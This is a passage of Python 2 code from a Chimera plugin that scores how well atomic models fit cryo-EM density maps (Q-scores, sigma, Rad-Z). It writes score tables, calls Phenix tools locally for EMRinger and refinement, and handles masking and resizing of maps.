fp.write ( "\t\t\t%f\t\t" % (avgQ) )
fp.write ( "\t\t\t%f\t\t" % (avgQ) )
fp.write ( "\t\t\t%f\n" % (avgQ) )
ii += 1
if r.isNA :
fp.write ( "%s\t%s\t%d\t%f\t%f\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.qSC, r.Q, avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,1,1), N(Qs,i,2,1), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,1,2), N(Qs,i,2,2), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,1,3), N(Qs,i,2,3), avgQrna ) )
fp.write ( "%f\t%f\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,1,5), N(Qs,i,2,5), avgQrna ) )
elif r.isProt :
if len(r.scAtoms) > 0 :
fp.write ( "%s\t%s\t%d\t%f\t%f\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.qSC, r.Q, avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,1,1), N(Qs,i,2,1), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,1,2), N(Qs,i,2,2), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,1,3), N(Qs,i,2,3), avgQprot ) )
fp.write ( "%f\t%f\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,1,5), N(Qs,i,2,5), avgQprot ) )
else :
fp.write ( "%s\t%s\t%d\t%f\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.qBB, r.Q, avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,1), N(Qs,i,2,1), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,2), N(Qs,i,2,2), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\t\t" % (N(Qs,i,0,3), N(Qs,i,2,3), avgQprot ) )
fp.write ( "%f\t\t%f\t%f\n" % (N(Qs,i,0,5), N(Qs,i,2,5), avgQprot ) )
elif r.type.upper() in chargedIons :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQIon ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQIon ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQIon ) )
elif r.type.upper() == "HOH" :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQWater ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQWater ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQWater ) )
else :
fp.write ( "%s\t%s\t%d\t\t\t%f\t%f\t\t" % (r.id.chainId, r.type, r.id.position, r.Q, avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,1), avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,2), avgQprot ) )
fp.write ( "\t\t%f\t%f\t\t" % (N(Qs,i,2,3), avgQprot ) )
fp.write ( "\t\t%f\t%f\n" % (N(Qs,i,2,5), avgQprot ) )
last_i = r.id.position
fp.write ( "\n\n" )
fp.close()
print ""
def CalcRadZ ( mol, cid, dmap, allAtTree, useOld=False, log=False ) :
print "Rad-Z Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if not useOld :
ress.append ( r )
elif not hasattr (r, 'scS' ) :
ress.append ( r )
print " - residues to do: %d" % len(ress)
for ri, r in enumerate ( ress ) :
r.scZ = RadZ ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2 )
r.bbZ = RadZ ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2 )
if log and ri % 10 == 0 :
status ( "Calculating - res %d/%d" % (ri, len(ress)) )
print ".",
scoresBB, scoresSC = [], []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if r.bbZ != None :
scoresBB.append ( r.bbZ )
if r.scZ != None :
scoresSC.append ( r.scZ )
print " - avg radz - side chain %.1f, backbone %.1f" % (numpy.average(scoresSC), numpy.average(scoresBB) )
return numpy.average(scoresBB), numpy.average(scoresSC)
def qwork (num, ress, dmap, allAtTree, log):
print 'qwork %d - %d res, %d - %d' % (num, len(ress), ress[0].id.position, ress[-1].id.position)
for ri, r in enumerate ( ress ) :
r.scZ = RadAts ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
r.bbZ = RadAts ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
if num == 0 and log :
status ( "Calculating Q scores - %d/%d" % (ri, len(ress)) )
print ".",
def CalcSigma ( mol, cid, dmap, allAtTree, useOld=False, log=False ) :
print "Sigma Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
if not useOld :
ress.append ( r )
elif not hasattr (r, 'scS' ) :
ress.append ( r )
print " - residues to do: %d" % len(ress)
if 0 :
import multiprocessing, threading
N = 4 # multiprocessing.cpu_count()
print " - cores: %d" % N
dn = len(ress) / N
threads = []
for i in range(N):
l = i * dn
h = (i+1)*dn if i != N-1 else len(ress)
#print "t %d, %d-%d" % (i, l, h)
#t = threading.Thread(target=qwork, args=(i,ress[l:h], dmap, allAtTree))
#threads.append(t)
#t.start()
#t = threading.Thread(name='d%d'%i, target=qwork, args=(i,ress[l:h], dmap, allAtTree, log))
#t.setDaemon(True)
#t.start()
#threads.append(t)
#print __name__
if 1 or __name__ == '__main__':
p = ctx.Process(target=qwork, args=(i,ress[l:h], dmap, allAtTree, log))
p.start()
threads.append(p)
for i, t in enumerate(threads) :
print "j %d" % (i)
t.join()
else :
for ri, r in enumerate ( ress ) :
r.bbZ = RadAts ( r.bbAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
r.scZ = RadAts ( r.scAtoms, dmap, allAtTree=allAtTree, show=0, log=0, numPts=10, toRAD=2, dRAD=0.2 )
if log and ri % 10 == 0 :
status ( "Calculating - res %d/%d" % (ri, len(ress)) )
print ".",
scoresBB, scoresSC = [], []
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
ress.append ( r )
if r.bbZ != None : scoresBB.append ( r.bbZ )
if r.scZ != None : scoresSC.append ( r.scZ )
#sc = [x for x in scores if x is not None]
#scSC = [1.0/x for x in scoresSC if x is not None]
#scBB = [1.0/x for x in scoresBB if x is not None]
#print " - %d res, SC min %.2f max %.2f, avg %.2f" % (len(ress), min(scSC), max(scSC), numpy.average(scSC))
print " - avg sigma - side chain %.1f, backbone %.1f" % (numpy.average(scoresSC), numpy.average(scoresBB) )
if 0 :
sByType = {}
rByType = {}
for r in ress :
if r.scZ != None :
if not r.type in sByType :
rByType[r.type] = []
sByType[r.type] = []
rByType[r.type].append ( [r.scZ, r] )
sByType[r.type].append ( [r.scZ] )
avgs = []
for rtype, ra in sByType.iteritems () :
avgs.append ( [numpy.average (ra), rtype] )
from chimera.resCode import protein3to1
from chimera.resCode import nucleic3to1
avgs.sort ( reverse=True, key=lambda x: x[0] )
mapName = os.path.splitext(dmap.name)[0]
molName = os.path.splitext(mol.name)[0]
mdir, mpfile = os.path.split(dmap.data.path)
foname = mdir + "/" + mapName + "__" + molName + ".txt"
print " - scores to: " + foname
fp = open (foname,"w")
for avgScore, rtype in avgs :
rscores = rByType[rtype]
rscores.sort ( reverse=False, key=lambda x: x[0] )
hr = rscores[0]
R = hr[1]
highestScore = hr[0]
numRes = len(rscores)
rts = ""
if R.isProt : rts = protein3to1[rtype]
else : rts = nucleic3to1[rtype]
print "%s\t%s\t%d\t%f\t%d\t.%s\t%f" % (rtype, rts, numRes, avgScore, R.id.position, R.id.chainId, highestScore)
fp.write ( "%s\t%s\t%d\t%f\t%d\t.%s\t%f\n" % (rtype, rts, numRes, avgScore, R.id.position, R.id.chainId, highestScore) )
fp.close()
return numpy.average(scoresBB), numpy.average(scoresSC)
def CalcResQ (r, dmap, sigma, allAtTree=None, numPts=8, toRAD=2.0, dRAD=0.1, minD=0.0, maxD=1.0, useOld=False ) :
scQ, bbQ, Q, numSC, numBB = 0.0, 0.0, 0.0, 0.0, 0.0
for at in r.atoms :
if at.element.name == "H" :
continue
if not hasattr ( at, 'isBB' ) :
SetBBAts ( at.molecule )
if not hasattr ( at, 'Q' ) or not useOld :
#qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=numPts, toRAD=toRAD, dRAD=dRAD, minD=minD, maxD=maxD )
at.Q = 0
at.CC = 0
Q += at.Q
if r.isProt or r.isNA :
if at.isBB :
bbQ += at.Q
numBB += 1.0
else :
scQ += at.Q
numSC += 1.0
if r.isProt or r.isNA :
if int(numSC) != len(r.scAtoms) :
print " - res %d.%s.%s - %.0f/%d sc atoms" % (r.id.position,r.type,r.id.chainId, numSC, len(r.scAtoms))
if numSC > 0 :
r.scQ = scQ / numSC
else :
r.scQ = None
if numBB > 0 :
r.bbQ = bbQ / numBB
else :
r.bbQ = None
r.Q = Q / float ( len(r.atoms) )
def CalcQ_ ( mol, cid, dmap, sigma=0.5, allAtTree=None, useOld=False, log=False ) :
print "Q Scores - in parallel"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
ress.append ( r )
print " - residues to do: %d" % len(ress)
import multiprocessing
threads = multiprocessing.cpu_count() / 2
print 'calc q using %d threads' % threads
# Avoid periodic Python context switching.
import sys
original_check_interval = sys.getcheckinterval()
sys.setcheckinterval(1000000000)
# Define thread class for fitting.
from threading import Thread
class Q_Thread(Thread):
def __init__(self, ress, ti):
Thread.__init__(self)
self.ress = ress
self.ti = ti
def run(self):
print "run - %d - %d" % (self.ti, len(ress))
for ri, r in enumerate ( self.ress ) :
#CalcResQ (r, dmap, sigma, allAtTree=allAtTree, numPts=2, toRAD=2.0, dRAD=0.2 )
#print "%d-%d/%d" % (ti,ri/len(self.ress)),
for at in r.atoms :
if at.element.name != "H" :
qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5 )
# Starts threads with each calculating an equal number of fits.
n = len(ress)
g = [ress[(n*c)/threads:(n*(c+1))/threads] for c in range(threads)]
threads = []
for mi, ml in enumerate(g) :
#print "%d - %d, %d-%d" % (mi,len(ml),ml[0].id.position,ml[-1].id.position)
t = Q_Thread(ml,mi)
threads.append(t)
for t in threads:
t.start()
print ""
# Wait for all threads to finish
for t in threads:
t.join()
# Restore periodic context switching.
sys.setcheckinterval(original_check_interval)
# Collect fit results from all threads.
#for t in threads:
# print "",
def CalcQ ( mol, cid, dmap, sigma, allAtTree=None, useOld=False, log=False ) :
minD, maxD = MinMaxD ( dmap )
print ""
print "Q Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
print " - sigma: %.2f" % sigma
print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
SetBBAts ( mol )
atoms = []
import time
start = time.time()
#ress = []
for r in mol.residues :
if cid == None or cid == "All" or r.id.chainId == cid :
for at in r.atoms :
if at.element.name == "H" :
continue
atoms.append ( at )
print " - atoms to do: %d" % len(atoms)
#for ai, at in enumerate ( atoms[0:2] ) :
# qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
from chimera import tasks, CancelOperation
task = tasks.Task('Calculating Q-scores', modal = True)
try :
for ai, at in enumerate ( atoms ) :
at.Q = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
at.bfactor = at.Q
end = time.time()
totSec = end - start
leftTime = ""
leftSec = 0.0
iPerSec = float(ai) / totSec
if iPerSec > 0 :
leftSec = float ( len(atoms) - ai ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
if (ai+1) % 100 == 0 :
if log :
print "Calculating Q scores - atom %d/%d - eta: %s" % (ai+1, len(atoms), leftTime)
task.updateStatus( "Calculating Q scores - atom %d/%d - eta: %s" % (ai+1, len(atoms), leftTime) )
except :
print " - something went wrong..."
return None
finally :
task.finished()
end = time.time()
print ""
print " - done, time: %f" % ( end-start )
totSec = end - start
totMin = numpy.floor ( totSec / 60.0 )
totSec = totSec - totMin * 60.0
print " - done, time: %.0f min, %.1f sec" % ( totMin, totSec )
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
try :
nname = molPath + "__Q__" + mapName + ".pdb"
chimera.PDBio().writePDBfile ( [mol], nname )
print " - saved %s with Q-scores in O column" % nname
except :
print " - could not save Q-scores file"
pass
Qavg = QStats1 ( mol, cid )
return Qavg
def QsFromFile ( mol, nname ) :
rids = {}
for r in mol.residues :
rids["%d.%s" % (r.id.position,r.id.chainId)] = r
# http://www.wwpdb.org/documentation/file-format-content/format33/sect9.html#ATOM
try :
fin = open ( nname, "r" )
except :
#print " - file not found"
return False
print " - Qs from file: %s" % nname
for line in fin :
if line[0:4] == "ATOM" or line[0:6] == "HETATM" :
aname, aloc, cid, resi, occ, bfac = line[12:16].strip(), line[16:17].strip(), line[21], int(line[22:26]), float ( line[54:60] ), float ( line[60:66] )
#if occ < 1.0 :
rid = "%s.%s" % (resi,cid)
if rid in rids :
r = rids[rid]
if aname in r.atomsMap :
ats = r.atomsMap[aname]
found = False
for at in ats :
if at.altLoc == aloc :
at.Q = bfac
at.bfactor = at.Q
#at.bfactor = 100.0 * (1.0 - at.Q)
found = True
if not found :
#print " -xx- %s.%s - atom %s - loc %s" % (resi, cid, aname, aloc)
continue
else :
#print " -xx- %s.%s - atom %s" % (resi,cid, aname)
continue
fin.close ()
return True
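# Note: QsFromFile above depends on the fixed-column PDB ATOM/HETATM record layout
# (see the wwPDB format document referenced in the function). The slices used are:
#   line[12:16]  atom name         line[16:17]  altLoc
#   line[21]     chain id          line[22:26]  residue sequence number
#   line[54:60]  occupancy         line[60:66]  B-factor (where the Q-score is stored)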
def QScoreFileName ( mol, dmap ) :
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
return nname
def AddSpherePts ( pts, clr, rad, mname = "RAD points" ) :
from chimera import elements, Coord, Atom, MolResId
ptsMol = GetMod ( mname )
res = None
if ptsMol == None:
from chimera import Molecule, openModels
ptsMol = Molecule()
ptsMol.name = mname
ptsMol.isRealMolecule = False
openModels.add ( [ptsMol], noprefs = True )
res = ptsMol.newResidue('marker', chimera.MolResId('1', 1) )
else :
res = ptsMol.residues[0]
for pt in pts :
a = ptsMol.newAtom('', elements.H)
res.addAtom(a)
a.setCoord ( chimera.Point(*pt) ) # ( chimera.Point(*xyz) )
a.radius = rad
a.drawMode = Atom.Sphere
a.color = chimera.MaterialColor ( *clr )
a.surfaceCategory = 'markers'
def SpherePts ( ctr, rad, N ) :
thetas, phis = [], []
from math import acos, sin, cos, sqrt, pi
for k in range ( 1, N+1 ) :
h = -1.0 + ( 2.0*float(k-1)/float(N-1) )
phis.append ( acos(h) )
thetas.append ( 0 if k == 1 or k == N else
(thetas[k-2] + 3.6/sqrt(N*(1.0-h**2.0))) % (2*pi) )
pts = [None] * N
for i, theta, phi in zip ( range(N), thetas, phis ):
v = chimera.Vector (sin(phi)*cos(theta), sin(phi)*sin(theta), cos(phi))
#if numpy.abs ( v.length - 1.0 ) > 1e-3 :
# print "x"
pt = ctr + v * rad
pts[i] = pt
return pts
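# Note: SpherePts above places N quasi-uniform points on a sphere of radius `rad` around
# `ctr` using a spiral construction: z-values are evenly spaced in [-1, 1] and the longitude
# advances by ~3.6/sqrt(N*(1-h^2)) at each step. The following is an illustrative, vectorized
# numpy-only sketch of the same idea (assumes N >= 2 and a plain 3-sequence for ctr; it is
# not used elsewhere in this file):
def _sphere_pts_numpy_sketch ( ctr, rad, N ) :
    import numpy
    k = numpy.arange ( 1, N+1, dtype=numpy.float64 )
    h = -1.0 + 2.0 * (k - 1.0) / (N - 1.0)        # evenly spaced z in [-1, 1]
    phi = numpy.arccos ( h )                      # polar angle
    theta = numpy.zeros ( N )                     # azimuth; first and last points stay at 0
    theta[1:-1] = numpy.cumsum ( 3.6 / numpy.sqrt ( N * (1.0 - h[1:-1]**2) ) ) % (2.0*numpy.pi)
    v = numpy.column_stack ( ( numpy.sin(phi)*numpy.cos(theta),
                               numpy.sin(phi)*numpy.sin(theta),
                               numpy.cos(phi) ) )
    return numpy.asarray ( ctr, dtype=numpy.float64 ) + rad * v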
import threading
def Calc_ ( label="", res=0.0 ) :
print "Calc Q scores:", label
from VolumeViewer import Volume
vols = chimera.openModels.list(modelTypes = [Volume])
if len(vols) == 0 :
print " - no volumes loaded"
return
dmap = vols[0]
print " - dmap: %s" % dmap.name
print " - res: %s" % res
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mols = chimera.openModels.list(modelTypes = [Molecule])
if len(mols) == 0 :
print " - no molecules loaded"
return
mol = mols[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
#allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
allAtTree = None
qs, dr, q, qcc, emr = 0,0,0,0,0
#bbRadZ, scRadZ, scRotaZ = 0,0,0
sigma = 0.4
cid = None
#cid = mol.residues[0].id.chainId
qs = CalcQp ( mol, cid, dmap, sigma=sigma, allAtTree=allAtTree, useOld=False )
print ""
print "Avg. Q scores:"
print ""
tps = qs.keys()
tps.sort()
for tp in tps :
print " - %s : %.2f" % (tp, qs[tp])
print ""
if 1 :
at = 30
fp = None
if os.path.isdir("/Users/greg/Dropbox/_mapsq") :
fp = open ( "/Users/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
elif os.path.isdir("/home/greg/Dropbox/_mapsq") :
fp = open ( "/home/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
elif os.path.isdir("C:/Users/greg/Dropbox/_mapsq") :
fp = open ( "C:/Users/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
else :
fp = open ( "scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
fp.write ( "%s\t%s\t%s" % (dmap.name, mol.name, res) )
for tp in tps :
fp.write ( "\t%s\t%.2f" % (tp, qs[tp]) )
fp.write ( "\n" )
#nProt = len ( [at for at in mol.atoms if at.residue.isProt == True] )
#nNA = len ( [at for at in mol.atoms if at.residue.isNA == True] )
#fp.write ( "%s\t%s\t%s\t%d\t%d\n" % (dmap.name, mol.name, res, nProt, nNA) )
fp.close ()
def emringer ( dmap, mol ) :
print "----- %s ____________ EMRINGER ____________ %s -----" % (dmap.name, mol.name)
cdir = os.getcwd()
print " - now in: ", cdir
#print " - splitting " + mol.openedAs[0]
mpath, mname = os.path.split ( mol.openedAs[0] )
dpath, dname = os.path.split ( dmap.data.path )
bs = os.path.splitext ( mol.openedAs[0] )[0]
print " - copying mol file... removes symmetry/connect stuff"
fin = open ( mol.openedAs[0], "r" )
fout = open ( bs + "_.pdb", "w" )
for line in fin :
if "ATOM" in line or "HETATM" in line :
fout.write ( line )
fin.close ()
fout.close ()
phPath = "/Users/greg/_mol/phenix-1.14-3260/build/bin/"
#phPath = "/Users/greg/_mol/phenix-1.15rc3-3435/build/bin/"
args = [phPath+'phenix.emringer', dmap.data.path, bs+"_.pdb" ]
print "running: ",
for arg in args : print arg,
print ""
outf = mpath + '/' + '_out.txt'
errf = mpath + '/' + '_err.txt'
fout = open ( outf, "w" )
ferr = open ( errf, "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, stderr=ferr, cwd=mpath)
p.wait()
fout.close()
ferr.close()
print " - getting score from " + outf
score = -100
fin = open ( outf )
for l in fin :
if "EMRinger Score:" in l :
s = l [ len("EMRinger Score:")+1 : ]
print "Score: ", s
score = float( s )
print " - found score: %.3f" % score
print " - removing ", bs + "_.pdb"
import shutil
try :
os.remove ( bs + "_.pdb" )
os.remove ( bs + "__emringer.pkl" )
os.remove ( bs + "__emringer.csv" )
shutil.rmtree ( bs + "__emringer_plots" )
print " - done"
except :
print " -- did not find"
return score
def refine ( dmap, mol, res ) :
print "----- %s ____________ REFINE ____________ %s -----" % (dmap.name, mol.name)
cdir = os.getcwd()
print " - now in: ", cdir
#print " - splitting " + mol.openedAs[0]
mpath, mname = os.path.split ( mol.openedAs[0] )
dpath, dname = os.path.split ( dmap.data.path )
bs = os.path.splitext ( mol.openedAs[0] )[0]
print " - copying mol file... removes symmetry/connect stuff"
fin = open ( mol.openedAs[0], "r" )
fout = open ( bs + "_.pdb", "w" )
for line in fin :
if "ATOM" in line or "HETATM" in line :
fout.write ( line )
fin.close ()
fout.close ()
phPath = "/Users/greg/_mol/phenix-1.14-3260/build/bin/"
phPath = "/Users/greg/_mol/phenix-1.15rc3-3435/build/bin/"
args = [phPath+'phenix.real_space_refine', dmap.data.path, bs+"_.pdb", "resolution=%.1f"%res ]
print "running: ",
for arg in args : print arg,
print ""
outf = mpath + '/' + '_out.txt'
errf = mpath + '/' + '_err.txt'
fout = open ( outf, "w" )
ferr = open ( errf, "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, stderr=ferr, cwd=mpath)
p.wait()
fout.close()
ferr.close()
print " - getting score from " + outf
score = -100
fin = open ( outf )
for l in fin :
if "EMRinger Score:" in l :
s = l [ len("EMRinger Score:")+1 : ]
print "Score: ", s
score = float( s )
print " - found score: %.3f" % score
print " - removing ", bs + "_.pdb"
import shutil
try :
os.remove ( bs + "_.pdb" )
os.remove ( bs + "__emringer.pkl" )
os.remove ( bs + "__emringer.csv" )
shutil.rmtree ( bs + "__emringer_plots" )
print " - done"
except :
print " -- did not find"
return score
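# Note: refine() above reuses emringer()'s log parsing verbatim, i.e. it looks for an
# "EMRinger Score:" line in the phenix.real_space_refine output; if that line is absent,
# the returned score stays at its -100 sentinel value.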
def refdir ( rdir ) :
print "Refining in", rdir
def CalcR_ ( label = "" ) :
print "Calc all scores -", label
from VolumeViewer import Volume
dmap = chimera.openModels.list(modelTypes = [Volume])[0]
print " - dmap: %s" % dmap.name
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mol = chimera.openModels.list(modelTypes = [Molecule])[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
mapName = os.path.splitext(dmap.name)[0]
molName = os.path.splitext(mol.name)[0]
ddir, dfile = os.path.split(dmap.data.path)
molFile = mol.openedAs[0]
mdir, mfile = os.path.split(molFile)
print "PhFmap -- " + molFile
RES = 3.0
print " -- res %.1f -- " % RES
outFile = molFile + "_r%.0f" % RES + "_fmodel.ccp4"
if not os.path.isfile ( outFile ) :
phPath = "/usr/local/phenix-1.14-3260/build/bin/"
args = [phPath+'phenix.fmodel', "high_resolution=%.1f"%RES, "scattering_table=electron", "generate_fake_p1_symmetry=True", molFile ]
print "running: ",
for arg in args : print arg,
print ""
fout = open ( mdir + '/' + '_0_fmodel.log', "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, cwd=mdir)
p.wait()
fout.close()
print ""
args = [phPath+'phenix.mtz2map', "high_resolution=%.1f"%RES, "include_fmodel=true", "scattering_table=electron", molFile, molFile + ".mtz" ]
print "running: ",
for arg in args : print arg,
print ""
fout = open ( mdir + '/' + '_1_mtz2map.log', "w" )
p = subprocess.Popen(args, stdout=fout, cwd=mdir)
p.wait()
fout.close()
print " - renaming to:", outFile
os.rename( molFile + "_fmodel.ccp4", outFile )
os.remove( molFile + ".mtz" )
print " - loading map:", outFile
dm = chimera.openModels.open ( outFile )[0]
molg = MyMolMapX ( mol, mol.atoms, RES, dmap.data.step[0], chimera.Xform.identity() )
fpoints, fpoint_weights = fit_points_g ( molg, 0.1 )
map_values = dmap.interpolated_values ( fpoints, mol.openState.xform )
mmolap, mmcorr1, mmcorr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
print "Molmap - olap: %f, CC: %f, CCm: %f" % (mmolap, mmcorr1, mmcorr2)
fpoints, fpoint_weights = fit_points_g ( dm.data, 5.0 )
map_values = dmap.interpolated_values ( fpoints, dm.openState.xform )
olap, phcorr1, phcorr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
print "Phenix - olap: %f, CC: %f, CCm: %f" % (olap, phcorr1, phcorr2)
#fpoints, fpoint_weights = fit_points_g ( dmap.data, -1e6 )
#map_values = dm.interpolated_values ( fpoints, dmap.openState.xform )
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#print "Phenix - olap: %f, CC: %f, CCm: %f" % (olap, corr1, corr2)
print "%f\t%f\t%f\t%f" % (mmcorr1, mmcorr2, phcorr1, phcorr2)
fp = open ( "/Users/greg/Dropbox/_mapsq/scores3_R_%s.txt" % label, "a" )
fp.write ( "%s\t%f\t%f\t%f\t%f\n" % (dmap.name.split("_")[0], mmcorr1, mmcorr2, phcorr1, phcorr2) )
fp.close ()
def MaskMapResize ( atoms, R, dmap, fout=None ) :
import _multiscale
import _contour
import _volume
from _contour import affine_transform_vertices as transform_vertices
from VolumeData import grid_indices, zone_masked_grid_data, interpolate_volume_data
points = _multiscale.get_atom_coordinates ( atoms, transformed = True )
#print " %d points" % len(points)
fpoints = points
if 0 :
_contour.affine_transform_vertices ( points, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
mdata = VolumeData.zone_masked_grid_data ( dmap.data, points, R )
#mdata = VolumeData.Array_Grid_Data ( mdata.full_matrix(), dmap.data.origin, dmap.data.step, dmap.data.cell_angles, name = "atom masked" )
mat = mdata.full_matrix()
threshold = 1e-3
points = _volume.high_indices(mat, threshold)
fpoints = points.astype(numpy.single)
fpoint_weights = mat[points[:,2],points[:,1],points[:,0]]
#print " %d points" % len(points)
nz = numpy.nonzero( fpoint_weights )[0]
#print " %d pts nonzero" % len(nz)
if len(nz) > 0 and len(nz) < len (fpoint_weights) :
fpoints = numpy.take( fpoints, nz, axis=0 )
fpoint_weights = numpy.take(fpoint_weights, nz, axis=0)
else :
_contour.affine_transform_vertices ( fpoints, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
#transform_vertices( fpoints, dmap.data.ijk_to_xyz_transform )
transform_vertices( fpoints, dmap.data.xyz_to_ijk_transform )
#print " - %s mask %d atoms, %d nonzero points" % ( dmap.name, len(atoms), len(nz) )
#transform_vertices( fpoints, Matrix.xform_matrix( fmap.openState.xform ) )
#transform_vertices( fpoints, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
#transform_vertices ( fpoints, dmap.data.xyz_to_ijk_transform )
bound = 6
li,lj,lk = numpy.min ( fpoints, axis=0 ) - (bound, bound, bound)
hi,hj,hk = numpy.max ( fpoints, axis=0 ) + (bound, bound, bound)
n1 = hi - li + 1
n2 = hj - lj + 1
n3 = hk - lk + 1
#print " - bounds - %d %d %d --> %d %d %d --> %d %d %d" % ( li, lj, lk, hi, hj, hk, n1,n2,n3 )
#nmat = numpy.zeros ( (n1,n2,n3), numpy.float32 )
#dmat = dmap.full_matrix()
nstep = (dmap.data.step[0], dmap.data.step[1], dmap.data.step[2] )
nn1 = int ( round (dmap.data.step[0] * float(n1) / nstep[0]) )
nn2 = int ( round (dmap.data.step[1] * float(n2) / nstep[1]) )
nn3 = int ( round (dmap.data.step[2] * float(n3) / nstep[2]) )
O = dmap.data.origin
#print " - %s origin:" % dmap.name, O
nO = ( O[0] + float(li) * dmap.data.step[0],
O[1] + float(lj) * dmap.data.step[1],
O[2] + float(lk) * dmap.data.step[2] )
#print " - new map origin:", nO
ox = round ( nO[0]/dmap.data.step[0] ) * dmap.data.step[0]
oy = round ( nO[1]/dmap.data.step[1] ) * dmap.data.step[1]
oz = round ( nO[2]/dmap.data.step[2] ) * dmap.data.step[2]
nO = ( ox, oy, oz )
#print " - new map origin:", nO
